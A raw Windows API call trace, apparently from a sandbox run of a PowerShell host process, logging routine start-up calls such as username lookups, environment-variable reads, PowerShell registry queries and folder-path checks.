	[0293.791] GetUserNameW (in: lpBuffer=0x262650, pcbBuffer=0x16d6c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d6c8) returned 1
	[0293.791] CoTaskMemFree (pv=0x262650) 
	[0293.791] ReportEventW (hEventLog=0x1b810008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e298d0*="Certificate", lpRawData=0x2e29660) returned 1
	[0293.959] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0293.959] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.960] CoTaskMemFree (pv=0x2c9fb0) 
	[0293.961] GetLogicalDrives () returned 0x4
	[0293.961] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0293.973] CoTaskMemAlloc (cb=0x20e) returned 0x2ba390
	[0293.973] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x2ba390 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0293.974] CoTaskMemFree (pv=0x2ba390) 
	[0293.975] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0293.975] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.975] CoTaskMemFree (pv=0x2c9fb0) 
	[0293.975] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0293.975] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0293.976] CoTaskMemFree (pv=0x2c9fb0) 
	[0294.561] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0294.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0294.561] CoTaskMemFree (pv=0x2c9fb0) 
	[0294.565] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0294.565] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0294.565] CoTaskMemFree (pv=0x2c9fb0) 
	[0294.566] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0294.566] SetErrorMode (uMode=0x1) returned 0x1
	[0294.566] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d2d0 | out: lpFileInformation=0x16d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0294.567] SetErrorMode (uMode=0x1) returned 0x1
	[0294.567] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0294.567] SetErrorMode (uMode=0x1) returned 0x1
	[0294.567] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d2d0 | out: lpFileInformation=0x16d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0294.567] SetErrorMode (uMode=0x1) returned 0x1
	[0294.568] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0294.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0294.568] CoTaskMemFree (pv=0x2c9fb0) 
	[0294.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0294.576] SetErrorMode (uMode=0x1) returned 0x1
	[0294.576] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d290 | out: lpFileInformation=0x16d290*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0294.577] SetErrorMode (uMode=0x1) returned 0x1
	[0294.577] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d080, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0294.577] SetErrorMode (uMode=0x1) returned 0x1
	[0294.577] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x16d290 | out: lpFileInformation=0x16d290*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0294.577] SetErrorMode (uMode=0x1) returned 0x1
	[0294.577] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0294.577] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x16cf80, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0294.577] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0294.577] SetErrorMode (uMode=0x1) returned 0x1
	[0294.578] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d290 | out: lpFileInformation=0x16d290*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0294.578] SetErrorMode (uMode=0x1) returned 0x1
	[0294.578] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0294.578] SetErrorMode (uMode=0x1) returned 0x1
	[0294.578] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d290 | out: lpFileInformation=0x16d290*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0294.578] SetErrorMode (uMode=0x1) returned 0x1
	[0294.578] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0294.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0294.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0294.579] SetErrorMode (uMode=0x1) returned 0x1
	[0294.579] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d290 | out: lpFileInformation=0x16d290*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0294.579] SetErrorMode (uMode=0x1) returned 0x1
	[0294.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0294.579] SetErrorMode (uMode=0x1) returned 0x1
	[0294.579] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d290 | out: lpFileInformation=0x16d290*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0294.579] SetErrorMode (uMode=0x1) returned 0x1
	[0294.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0294.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0294.580] SetErrorMode (uMode=0x1) returned 0x1
	[0294.580] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d2d0 | out: lpFileInformation=0x16d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0294.580] SetErrorMode (uMode=0x1) returned 0x1
	[0294.580] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0294.580] SetErrorMode (uMode=0x1) returned 0x1
	[0294.580] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x16d2d0 | out: lpFileInformation=0x16d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0294.580] SetErrorMode (uMode=0x1) returned 0x1
	[0294.581] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x16d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0294.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x16cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0294.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0294.581] SetErrorMode (uMode=0x1) returned 0x1
	[0294.581] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d2d0 | out: lpFileInformation=0x16d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0294.581] SetErrorMode (uMode=0x1) returned 0x1
	[0294.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0294.581] SetErrorMode (uMode=0x1) returned 0x1
	[0294.581] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d2d0 | out: lpFileInformation=0x16d2d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0294.582] SetErrorMode (uMode=0x1) returned 0x1
	[0294.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0294.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x16cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0294.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x16d330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0294.584] SetErrorMode (uMode=0x1) returned 0x1
	[0294.584] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x16d590 | out: lpFileInformation=0x16d590*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0294.584] SetErrorMode (uMode=0x1) returned 0x1
	[0295.237] CoTaskMemAlloc (cb=0x804) returned 0x1b6d6480
	[0295.237] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b6d6480, nSize=0x16d8f8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x16d8f8) returned 0x1
	[0295.237] CoTaskMemFree (pv=0x1b6d6480) 
	[0295.237] CoTaskMemAlloc (cb=0x204) returned 0x262650
	[0295.237] GetUserNameW (in: lpBuffer=0x262650, pcbBuffer=0x16d938 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x16d938) returned 1
	[0295.237] CoTaskMemFree (pv=0x262650) 
	[0295.238] ReportEventW (hEventLog=0x1b810008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e625b8*="Available", lpRawData=0x2e62348) returned 1
	[0295.771] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0295.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.771] CoTaskMemFree (pv=0x2c9fb0) 
	[0295.772] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0295.772] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.772] CoTaskMemFree (pv=0x2c9fb0) 
	[0295.773] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0295.773] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0295.773] CoTaskMemFree (pv=0x2c9fb0) 
	[0295.773] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0295.773] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0295.773] CoTaskMemFree (pv=0x2c9fb0) 
	[0295.775] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d918 | out: phkResult=0x16d918*=0x3b0) returned 0x0
	[0295.776] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d89c, lpData=0x0, lpcbData=0x16d898*=0x0 | out: lpType=0x16d89c*=0x1, lpData=0x0, lpcbData=0x16d898*=0x56) returned 0x0
	[0295.776] CoTaskMemAlloc (cb=0x5a) returned 0x2cfa90
	[0295.776] RegQueryValueExW (in: hKey=0x3b0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d86c, lpData=0x2cfa90, lpcbData=0x16d868*=0x56 | out: lpType=0x16d86c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d868*=0x56) returned 0x0
	[0295.776] CoTaskMemFree (pv=0x2cfa90) 
	[0295.776] RegCloseKey (hKey=0x3b0) returned 0x0
	[0295.777] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0295.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.777] CoTaskMemFree (pv=0x2c9fb0) 
	[0295.796] VirtualQuery (in: lpAddress=0x16b970, lpBuffer=0x16c830, dwLength=0x30 | out: lpBuffer=0x16c830*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.796] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0295.797] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.797] CoTaskMemFree (pv=0x2c9fb0) 
	[0295.798] VirtualQuery (in: lpAddress=0x16b970, lpBuffer=0x16c830, dwLength=0x30 | out: lpBuffer=0x16c830*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0295.803] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0295.803] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.803] CoTaskMemFree (pv=0x2c9fb0) 
	[0295.805] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0295.805] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.805] CoTaskMemFree (pv=0x2c9fb0) 
	[0295.808] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0295.808] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0295.808] CoTaskMemFree (pv=0x2c9fb0) 
	[0296.507] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0296.507] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.507] CoTaskMemFree (pv=0x2c9fb0) 
	[0296.513] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0296.513] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.514] CoTaskMemFree (pv=0x2c9fb0) 
	[0296.514] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0296.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0296.515] CoTaskMemFree (pv=0x2c9fb0) 
	[0296.519] VirtualQuery (in: lpAddress=0x16b970, lpBuffer=0x16c830, dwLength=0x30 | out: lpBuffer=0x16c830*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0296.521] VirtualQuery (in: lpAddress=0x16b970, lpBuffer=0x16c830, dwLength=0x30 | out: lpBuffer=0x16c830*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.233] VirtualQuery (in: lpAddress=0x16b970, lpBuffer=0x16c830, dwLength=0x30 | out: lpBuffer=0x16c830*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0297.235] CoTaskMemAlloc (cb=0x104) returned 0x2c9fb0
	[0297.235] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2c9fb0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0297.235] CoTaskMemFree (pv=0x2c9fb0) 
	[0298.808] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2ca3f0
	[0298.810] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2ca500
	[0303.088] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0303.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.088] CoTaskMemFree (pv=0x2ca610) 
	[0303.090] CoTaskMemAlloc (cb=0x104) returned 0x2ca610
	[0303.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2ca610, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0303.090] CoTaskMemFree (pv=0x2ca610) 
	[0303.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c5d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0303.105] VirtualQuery (in: lpAddress=0x16bc20, lpBuffer=0x16cae0, dwLength=0x30 | out: lpBuffer=0x16cae0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0303.110] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16da78 | out: phkResult=0x16da78*=0x2e4) returned 0x0
	[0303.110] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d9fc, lpData=0x0, lpcbData=0x16d9f8*=0x0 | out: lpType=0x16d9fc*=0x1, lpData=0x0, lpcbData=0x16d9f8*=0x56) returned 0x0
	[0303.110] CoTaskMemAlloc (cb=0x5a) returned 0x1b6f1430
	[0303.110] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d9cc, lpData=0x1b6f1430, lpcbData=0x16d9c8*=0x56 | out: lpType=0x16d9cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d9c8*=0x56) returned 0x0
	[0303.111] CoTaskMemFree (pv=0x1b6f1430) 
	[0303.111] RegCloseKey (hKey=0x2e4) returned 0x0
	[0303.111] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16da78 | out: phkResult=0x16da78*=0x2e4) returned 0x0
	[0303.111] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d9fc, lpData=0x0, lpcbData=0x16d9f8*=0x0 | out: lpType=0x16d9fc*=0x1, lpData=0x0, lpcbData=0x16d9f8*=0x56) returned 0x0
	[0303.111] CoTaskMemAlloc (cb=0x5a) returned 0x1b6f1430
	[0303.111] RegQueryValueExW (in: hKey=0x2e4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d9cc, lpData=0x1b6f1430, lpcbData=0x16d9c8*=0x56 | out: lpType=0x16d9cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d9c8*=0x56) returned 0x0
	[0303.111] CoTaskMemFree (pv=0x1b6f1430) 
	[0303.111] RegCloseKey (hKey=0x2e4) returned 0x0
	[0303.112] CoTaskMemAlloc (cb=0x20c) returned 0x1b6c3700
	[0303.112] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b6c3700 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0303.112] CoTaskMemFree (pv=0x1b6c3700) 
	[0303.112] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x16d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0303.112] CoTaskMemAlloc (cb=0x20c) returned 0x1b6c3700
